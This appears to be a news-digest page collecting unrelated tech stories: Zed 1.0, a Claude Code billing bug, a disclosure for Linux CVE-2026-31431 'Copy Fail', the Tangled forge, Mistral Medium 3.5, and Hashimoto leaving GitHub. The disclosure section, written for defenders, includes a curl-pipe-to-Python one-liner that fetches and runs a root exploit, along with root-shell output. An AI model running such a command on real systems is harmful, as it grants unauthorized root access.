10 interesting stories served every morning and every evening.
April 29th, 2026
To create a fundamentally better editor, we had to invent a new approach to building desktop software. Our previous editor, Atom, was built as a fork of Chromium, spawning the Electron framework in the process. Electron eventually became the foundation of VS Code (which today seems to be forked into a new AI code editor every other week). Web technology offered an easy path to shipping flexible software, but it also imposed a ceiling. No matter how hard we worked, we couldn’t make Atom better than the platform it was built on.
So we started over. Instead of building Zed like a web page, we built it like a video game, organizing the entire application around feeding data to shaders running on the GPU. That meant writing our own UI framework, GPUI, from scratch in Rust.
Owning every layer of our stack lets us take Zed places that no one building on borrowed foundations can go, but we knew from the beginning that it wasn’t going to be an easy path. Thanks to years of hard work by our team and community, Zed is closer than ever to that ideal tool we set out to create. We’ve added a ton of capabilities while remaining true to our core ethos of craft and performance, and hundreds of thousands of developers now rely on Zed to ship software each day. That’s part of what gives us the confidence to declare version 1.0.
What 1.0 Means
Developers expect a modern editor to support dozens of languages and their ecosystems, with endless variations and edge cases across every stack: Git integration, SSH remoting, a debugger, and, yes, rainbow brackets. We’ve spent five years building that surface area across Mac, Windows, and Linux, exceeding a million lines of code.
Zed is also an AI-native editor. You can run multiple agents in parallel, and edit predictions suggest your next change at keystroke granularity and with the speed you’ve come to expect from Zed. The Agent Client Protocol opens Zed up to a growing number of the best agents out there, including Claude Agent, Codex, OpenCode, and more recently Cursor. We built AI into our editor’s foundation instead of bolting it on top.
We’re also launching Zed for Business. Companies have been asking us for a way to roll out Zed to their engineering teams, and very soon they can, with centralized billing, role-based access controls, and team management.
1.0 doesn’t mean “done”. It also doesn’t mean “perfect”. It means we’ve reached a tipping point where most developers can quickly feel at home in Zed. If you tried Zed a year or two ago and bounced because something was missing, 1.0 is our invitation to try again. Zed is more capable than it’s ever been, and still more performant.
Where We’re Going
Our vision hasn’t changed since we started: we’re building the most performant and collaborative coding environment. What’s changed is what collaboration means while creating software. It used to mean humans working together in real time. Now it means humans and AI agents, working in the same space, on the same code.
Building our own foundations is what got us to 1.0, and it’s also what makes the next chapter possible. We’re actively developing DeltaDB, a synchronization engine built on CRDTs that tracks every change with character-level granularity. DeltaDB lets multiple humans and agents share a single, consistent view of the codebase as it evolves. DeltaDB will allow you to invite teammates into conversations with agents to review and evolve agentic code directly in the context from which it’s generated.
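DeltaDB’s internals aren’t public, but the convergence property that CRDTs provide can be shown with a toy last-writer-wins register — a deliberately simplified sketch, not Zed’s actual design. Replicas can merge each other’s state in any order and still end up agreeing:

```python
class LWWRegister:
    """Toy last-writer-wins register: the highest (counter, replica) timestamp wins."""

    def __init__(self, replica: str):
        self.replica = replica
        self.value = None
        self.stamp = (0, replica)

    def set(self, value, counter: int):
        # Local edit: record the value with a fresh logical timestamp
        self.stamp = (counter, self.replica)
        self.value = value

    def merge(self, other: "LWWRegister"):
        # Merging is commutative and idempotent: keep whichever write is newest
        if other.stamp > self.stamp:
            self.value, self.stamp = other.value, other.stamp


a, b = LWWRegister("a"), LWWRegister("b")
a.set("fn main() {}", counter=1)         # human edit
b.set("fn main() { run() }", counter=2)  # agent edit, logically later
a.merge(b)
b.merge(a)
print(a.value == b.value)  # replicas converge to the same value
```

Real sequence CRDTs that track character-level edits are far more involved (each character carries a stable identity), but the merge-anywhere, converge-everywhere guarantee is the same.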
This vision depends on deep ownership of our fundamental primitives. It’s not an experience we’d be able to ship inside of someone else’s browser engine.
A Milestone, Not a Finish Line
We’ve shipped over a thousand versions of Zed, but all of them began with zero. Today, that changes.
We’ll keep shipping every week, the way we always have. The list of things to build will never end, and that’s exactly how we like it. Each release moves the craft forward.
If you want to try Zed, download now. If you want to help us build it, join us!
Summary
When a git repository’s recent commit history contains the case-sensitive string HERMES.md, Claude Code routes API requests to “extra usage” billing instead of the included Max plan quota. This silently burned through $200 in extra usage credits while my Max 20x plan capacity remained largely untouched (13% weekly usage).
Environment
Claude Code v2.1.119
macOS (Apple Silicon)
Max 20x plan ($200/month)
Model: claude-opus-4-6[1m] (also reproduces with claude-opus-4-7)
Reproduction
Minimal reproduction — no project files needed:
# This FAILS with "out of extra usage" (routes to extra usage billing)
mkdir /tmp/test-fail && cd /tmp/test-fail
git init && echo test > test.txt && git add . && git commit -m "add HERMES.md"
claude -p "say hello" --model "claude-opus-4-6[1m]"
# => API Error: 400 "You're out of extra usage..."
# This WORKS (routes to plan quota)
mkdir /tmp/test-pass && cd /tmp/test-pass
git init && echo test > test.txt && git add . && git commit -m "add hermes.md"
claude -p "say hello" --model "claude-opus-4-6[1m]"
# => "Hello!"
# Cleanup
rm -rf /tmp/test-fail /tmp/test-pass
The trigger is the string HERMES.md in git commit messages — not the presence of a file with that name on disk. Claude Code includes recent commits in its system prompt, and something server-side routes the request differently when this string is present.
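Since the report says the match is case-sensitive and lives in commit messages, a quick way to check your own repositories is a substring test over recent commit log output. This is a hypothetical helper for illustration, not part of Claude Code:

```python
import subprocess


def has_trigger(log_text: str, needle: str = "HERMES.md") -> bool:
    """Case-sensitive substring check, matching the reported trigger behavior."""
    return needle in log_text


if __name__ == "__main__":
    # Inspect the last 20 commit messages of the current repository
    log = subprocess.run(
        ["git", "log", "-n", "20", "--format=%B"],
        capture_output=True, text=True,
    ).stdout
    print(has_trigger(log))
```

The number of commits Claude Code actually includes in its system prompt is not documented here; 20 is just a guess for the check.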
What triggers it vs. what doesn’t
Impact
$200.98 in extra usage credits consumed for requests that should have been covered by the included Max 20x plan quota
Multiple projects became completely unusable once extra usage was depleted, while the plan dashboard showed 86%+ remaining weekly capacity
The error message (“out of extra usage”) gives no indication that content-based routing is the cause, making this extremely difficult to diagnose
Any user with HERMES.md in recent git commits would silently have their usage billed to extra credits
Expected behavior
API request billing should not depend on the content of git commit messages in the system prompt. All requests from a Max plan subscriber should route to the included plan quota first.
How I found this
Systematic binary search: cloning affected repos, testing orphan branches, then isolating individual commit-message strings until HERMES.md was identified as the exact trigger.
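The isolation step can be sketched as a generic bisection over candidate strings. Here `fails` stands in for "commit this subset of messages and see whether the request errors" — a hypothetical callback, shown with a pure predicate so the sketch is self-contained:

```python
def bisect_trigger(candidates, fails):
    """Narrow a list of candidate strings down to the one that makes
    fails(subset) return True; assumes exactly one trigger exists."""
    while len(candidates) > 1:
        mid = len(candidates) // 2
        left = candidates[:mid]
        # Keep whichever half still reproduces the failure
        candidates = left if fails(left) else candidates[mid:]
    return candidates[0]


messages = ["fix typo", "add HERMES.md", "bump version", "refactor tests"]
print(bisect_trigger(messages, lambda subset: any("HERMES.md" in m for m in subset)))
# => add HERMES.md
```

Each round halves the search space, so even a long commit history needs only logarithmically many test commits.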
CVE-2026-31431
100% reliable
every distro since 2017
container escape primitive
732 bytes
found by Xint Code
Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distribution shipped since 2017.
One logic bug in authencesn, chained through AF_ALG and splice() into a 4-byte page-cache write — silently exploitable for nearly a decade.
The demo
Same script, four distributions, four root shells — in one take. The same exploit binary works unmodified on every Linux distribution.
Who is affected
If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you’re in scope.
Copy Fail requires only an unprivileged local user account — no network access, no kernel debugging features, no pre-installed primitives. The kernel crypto API (AF_ALG) ships enabled in essentially every mainstream distro’s default config, so the entire 2017 → patch window is in play out of the box.
Distributions we directly verified:
These are what we tested directly. Other distributions running affected kernels — Debian, Arch, Fedora, Rocky, Alma, Oracle, the embedded crowd — behave the same. Tested it elsewhere? Open an issue to add to the list.
Should you patch first?
High
Multi-tenant Linux hosts
Shared dev boxes, shell-as-a-service, jump hosts, build servers — anywhere multiple users share a kernel.
any user becomes root
High
Kubernetes / container clusters
The page cache is shared across the host. A pod with the right primitives compromises the node and crosses tenant boundaries.
cross-container, cross-tenant
High
CI runners & build farms
GitHub Actions self-hosted runners, GitLab runners, Jenkins agents — anything that executes untrusted PR code as a regular user, on a shared kernel.
a PR becomes root on the runner
High
Cloud SaaS running user code
Notebook hosts, agent sandboxes, serverless functions, any tenant-supplied container or script.
tenant becomes host root
Medium
Standard Linux servers
Single-tenant production where only your team has shell access.
internal LPE; chains with web RCE or stolen creds
Lower
Single-user laptops & workstations
You’re already the only user. The bug doesn’t grant remote attackers access by itself, but any local code execution becomes root.
post-exploitation step-up
Exploit
The PoC is published so defenders can verify their own systems and validate vendor patches.
Use responsibly. Run only on systems you own or have written authorization to test. The script edits the page cache of a setuid binary; the change is not persistent across reboot, but the resulting root shell is real. Don’t run it on production.
copy_fail_exp.py 732 B
Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib). Targets /usr/bin/su by default; pass another setuid binary as argv[1].
sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9
Quick run:
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)
Issue tracker: https://github.com/theori-io/copy-fail-CVE-2026-31431
Mitigation
Patch first. Update your distribution’s kernel package to one that includes mainline commit a664bf3d603d — it reverts the 2017 algif_aead in-place optimization, so page-cache pages can no longer end up in the writable destination scatterlist. Most major distributions are shipping the fix now.
Before you can patch: disable the algif_aead module.
# echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
# rmmod algif_aead 2>/dev/null || true
What does this break? For the vast majority of systems — nothing measurable.
Will not affect: dm-crypt / LUKS, kTLS, IPsec/XFRM, in-kernel TLS, OpenSSL/GnuTLS/NSS default builds, SSH, kernel keyring crypto. These all use the in-kernel crypto API directly — they don’t go through AF_ALG.
May affect: userspace specifically configured to use AF_ALG — e.g. OpenSSL with the afalg engine explicitly enabled, some embedded crypto offload paths, or applications that bind aead/skcipher/hash sockets directly. Check with lsof | grep AF_ALG or ss -xa if in doubt.
Performance: AF_ALG is a userspace front door to the kernel crypto API. Disabling it does not slow anything that wasn’t already calling it; for the things that were, performance falls back to a normal userspace crypto library, which is what almost everything else already does.
For untrusted workloads (containers, sandboxes, CI), block AF_ALG socket creation via seccomp regardless of patch state.
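As one sketch of that advice, a Docker-style seccomp profile can deny `socket()` calls for the AF_ALG family by filtering the first argument (AF_ALG is family 38 on Linux). The profile layout follows Docker's seccomp JSON format; adapt it to your runtime, and the filename below is just an assumption:

```json
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["socket"],
      "action": "SCMP_ACT_ERRNO",
      "args": [
        { "index": 0, "value": 38, "op": "SCMP_CMP_EQ" }
      ]
    }
  ]
}
```

Applied with something like `docker run --security-opt seccomp=deny-afalg.json ...`, any attempt to open an AF_ALG socket inside the container fails with an errno instead of reaching the kernel crypto API.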
Disclosure timeline
2026-03-23: Reported to Linux kernel security team
2026-03-24: Initial acknowledgment
2026-03-25: Patches proposed and reviewed
2026-04-01: Patch committed to mainline
2026-04-22: CVE-2026-31431 assigned
2026-04-29: Public disclosure (https://copy.fail/)
Xint Code
Is your software AI-era safe?
Copy Fail was surfaced by Xint Code in about an hour of scan time against the Linux crypto/ subsystem. Full root cause, diagrams, and the operator prompt that found it are in the Xint blog write-up.
The same scan also surfaced other high-severity bugs, still in coordinated disclosure. Xint Code audits production codebases the same way — one operator prompt, no harnessing, prioritized findings with trigger and impact narratives.
Track record
0-day RCE
ZeroDay Cloud
Swept the database category — Redis, PostgreSQL, MariaDB. Zero human intervention.
Top 3
DARPA AIxCC
Finalist in the AI Cyber Challenge hosted by DoD DARPA.
9×
DEF CON CTF
Most-winning team in DEF CON CTF history.
git is decentralized, but what of the rest?
GitHub seems to be crumbling the past couple of weeks. Whatever the reason, it's ultimately not great for 90% of the world's OSS to depend on one provider. Centralized systems always crumble; it's the emails, gits, and IRCs that stand the test of time. Tangled aims to fit in this space; allow me to explain.
Code collaboration has always made use of two protocols, one for code transfer and one for communication:
It began with the email flow: git (code transfer) + email (comms)
Then there was GitHub: git (code transfer) + GitHub the website (comms)
There is the ForgeFed project: git (code transfer) + maybe ActivityPub (comms)
We are building Tangled: git (code transfer) + AT protocol (comms)
Tangled federates events among git servers (called “knots”). You can collaborate on repositories on any server and you can fork across servers. You can even push to a repository on your own server and open a pull request on a repo hosted on a completely different server. In a lot of ways, this is quite like hosting your own cgit instance and sending out patches via email.
Tangled uses AT to facilitate the Authenticated Transfer of events surrounding code, like issues and pull requests, and it also enables a few social bits: a timeline of events, follows, stars (and vouches very soon). AT is used to share collaborator invites and ssh pubkeys, but the rest is just good ol’ git.
OSS needs to break free from monocultures like GitHub, but code collaboration should still be fun and social.
Coding agents have mostly lived on your laptop. Today we’re moving them to the cloud, where they run on their own, in parallel, and notify you when they’re done. You can start them from the Mistral Vibe CLI or directly in Le Chat, offloading a coding task without leaving the conversation.
Powering this is Mistral Medium 3.5 in public preview, our new default model in Mistral Vibe and Le Chat, built to run for long stretches on coding and productivity work. The new Work mode in Le Chat (Preview) extends this with a powerful agent for complex, multi-step tasks like research, analysis, and cross-tool actions.
Highlights.
Mistral Medium 3.5, a new flagship model that merges instruction-following, reasoning, and coding into a single 128B dense model. Released as open weights, under a modified MIT license.
Strong real-world performance at a size that runs self-hosted on as few as four GPUs.
Mistral Vibe remote agents for async coding: sessions run in the cloud, can be spawned from the CLI or Le Chat, and a local CLI session can be teleported up to the cloud.
Start Mistral Vibe coding tasks in Le Chat. Sessions run on the same remote runtime and keep going while you step away.
Work mode in Le Chat runs on a new agent, powered by Mistral Medium 3.5, that works through multi-step tasks, calling tools in parallel until the job is done.
Mistral Medium 3.5.
Mistral Medium 3.5 is our first flagship merged model, available in public preview. It is a dense 128B model with a 256k context window, handling instruction-following, reasoning, and coding in a single set of weights. It performs strongly in real-world use, with self-hosting possible on as few as four GPUs. Reasoning effort is now configurable per request, so the same model can answer a quick chat reply or work through a complex agentic run. We trained the vision encoder from scratch to handle variable image sizes and aspect ratios.
Mistral Medium 3.5 scores 77.6% on SWE-Bench Verified, ahead of Devstral 2 and models like Qwen3.5 397B A17B. It also has strong agentic capabilities and scores 91.4 on τ³-Telecom.
The model was built for long-horizon tasks, calling multiple tools reliably, and producing structured output that downstream code can consume. It is the model that made async cloud agents in Vibe practical to ship.
Mistral Medium 3.5 becomes the default model in Le Chat. It also replaces Devstral 2 in our coding agent, Vibe CLI.
Vibe remote agents.
From today, coding sessions can work through long tasks while you’re away. Many can run in parallel, and you stop being the bottleneck on every step the agent takes.
You can start the cloud agents from the Mistral Vibe CLI or from Le Chat. While they run, you can inspect what the agent is doing, with file diffs, tool calls, progress states, and questions surfaced as you go. Ongoing local CLI sessions can be teleported up to the cloud when you want to leave them running, with session history, task state, and approvals carrying across.
Vibe sits between the systems engineering teams already use, with humans in the loop wherever they’re needed. It plugs into GitHub for code and pull requests, Linear and Jira for issues, Sentry for incidents, and apps like Slack or Teams for reporting.
Each coding session runs in an isolated sandbox, including broad edits and installs. When the work is done, the agent can open a pull request on GitHub and notify you, so you review the result instead of every keystroke that produced it.
It fits the high-volume, well-defined work that takes a developer’s time without taking their judgment: module refactors, test generation, dependency upgrades, CI investigations, as well as bug fixes.
We use Workflows orchestrated in Mistral Studio to bring Mistral Vibe into Le Chat. We originally built this for our own in-house coding environment, then for our enterprise customers. Today that capability opens up to everyone: anyone can now launch coding tasks from the web, and without being tied to a local terminal, a developer can run several in parallel.
You can start coding sessions directly in Le Chat, so a task described in chat runs on the same remote runtime as the CLI and the web, and comes back later as a finished branch or a draft PR.
New Work mode in Le Chat (Preview).
Work mode is a powerful new agentic mode for complex tasks in Le Chat, powered by a new harness and Mistral Medium 3.5. The agent becomes the execution backend for the assistant itself, so Le Chat can read and write, use several tools at once, and work through multi-step projects until it completes what you’ve asked.
Here’s what Work mode enables you to do today.
Cross-tool workflows: catch up across email, messages, and calendar in a single run; prepare for a meeting with attendee context, latest news, and talking points pulled from your sources.
Research and synthesis: dive into a topic across the web, internal docs, and connected tools, then produce a structured brief or report you can edit before exporting or sending.
Triage your inbox and draft replies; create issues in Jira from your team and customer discussions; send a summary to your team on Slack.
Sessions persist longer than a typical chat reply, so an agent can keep going across many turns, through trial-and-error, and through to completion. In Work mode, connectors are on by default rather than chosen manually, which lets the agent reach into documents, mailboxes, calendars, and other systems for the rich context it needs to take correct action.
Every action the agent takes is visible: you see each tool call and the thinking rationale. Le Chat will ask for explicit approval—based on your permissions—before proceeding with sensitive tasks like sending a message, writing a document, or modifying data.
Get started.
Mistral Medium 3.5 is available today in Mistral Vibe and Le Chat, and powers remote coding agents and Work mode in Le Chat on the Pro, Team, and Enterprise plans.
Through API, it’s priced at $1.5 per million input tokens and $7.5 per million output tokens. Open weights are on Hugging Face under a modified MIT license.
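At those rates, per-request cost is simple arithmetic. A quick sketch, where the token counts are made-up examples rather than measured figures:

```python
def cost_usd(input_tokens: int, output_tokens: int,
             in_rate: float = 1.5, out_rate: float = 7.5) -> float:
    """Rates are USD per million tokens, per the published pricing."""
    return (input_tokens * in_rate + output_tokens * out_rate) / 1_000_000


# e.g. a long agentic run: 200k tokens in, 50k tokens out
print(cost_usd(200_000, 50_000))  # 0.675
```

So a fairly heavy session on the order of a quarter-million tokens costs well under a dollar at these rates.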
It is also available for prototyping, hosted on NVIDIA GPU-accelerated endpoints on build.nvidia.com and as a scalable containerized inference microservice, NVIDIA NIM.
Build the future of agentic systems with us.
We’re hiring across research, engineering, and product to push agentic systems further. See our open roles.
HashiCorp co-founder Mitchell Hashimoto has decided GitHub is so unstable it is “no longer a place for serious work,” and will therefore move his current project elsewhere.
Hashimoto’s current labour of love is Ghostty, a terminal emulator that The Register has praised for its speed and for adding “some interesting new wrinkles” to a very mature category of software.
I want to ship software and it doesn’t want me to ship software
Like many developers, Hashimoto used GitHub to work on the project, and in a Tuesday post declared himself a fan.
“I’m GitHub user 1299, joined Feb 2008,” he wrote, and since then has used it almost every day.
“GitHub is the place that has made me the most happy,” he revealed, and “always made time for it” — even during his honeymoon because the service is “where I’ve historically been happiest and wanted to be.”
“Some people doom scroll social media. I’ve been doom scrolling GitHub issues since before that was a word,” he admitted. “On vacations I’d have bookmarks of different projects on GitHub I wanted to study. Not just source code, but OSS processes, how other maintainers react to difficult situations. Etc. Believe it or not, I like this.”
He’s liking GitHub a lot less these days.
“I’ve been angry about it. I’ve hurt people’s feelings. I’ve been lashing out. Because GitHub is failing me, every single day, and it is personal. It is irrationally personal,” he wrote.
The reason for his ire is the service has become unreliable.
“For the past month I’ve kept a journal where I put an ‘X’ next to every date where a GitHub outage has negatively impacted my ability to work,” he wrote. “Almost every day has an ‘X’. On the day I am writing this post, I’ve been unable to do any PR review for ~2 hours because there is a GitHub Actions outage.”
Hashimoto penned his post a few days before an April 28 incident that saw pull requests fail to complete due to an Elasticsearch SNAFU.
Incidents like that mean Hashimoto has decided GitHub “is no longer a place for serious work if it just blocks you out for hours per day, every day.”
“It’s not a fun place for me to be anymore,” he lamented. “I want to be there but it doesn’t want me to be there. I want to get work done and it doesn’t want me to get work done. I want to ship software and it doesn’t want me to ship software.”
The developer says he wants GitHub to improve, but “I also want to code. And I can’t code with GitHub anymore. I’m sorry. After 18 years, I’ve got to go.”
He’s open to a return if GitHub can deliver “real results and improvements, not words and promises.”
But for now, he’s working to move Ghostty to another collaborative code locker.
“We have a plan but I’m also very much still in discussions with multiple providers (both commercial and FOSS),” Hashimoto wrote. “It’ll take us time to remove all of our dependencies on GitHub and we have a plan in place to do it as incrementally as possible.”
He’s doing the equivalent of leaving a toothbrush at a former partner’s house by leaving a read-only mirror of Ghostty on GitHub, and by keeping his personal projects on the Microsoft-owned service.
But Hashimoto’s moving his day job somewhere new.
“Ghostty is where I, our maintainers, and our open source community are most impacted so that is the focus of this change. We’ll see where it goes after that,” he concluded.
After Microsoft acquired GitHub, many feared the software giant would inevitably bend the service into a more Redmond-centric operation that made life less pleasant for developers who aren’t tied to Windows and/or Azure ecosystems. Those fears largely proved unfounded and the service entrenched itself as the de facto place to work on and share code.
Hashimoto’s experience suggests that status is in peril, and comes at a time when Microsoft has admitted Windows has serious quality problems, in part because it forcibly injected AI into too many tools. The increasing frequency of the GitHub wobbles Hashimoto observed also coincides with Microsoft’s AI obsession. Make of that what you will. ®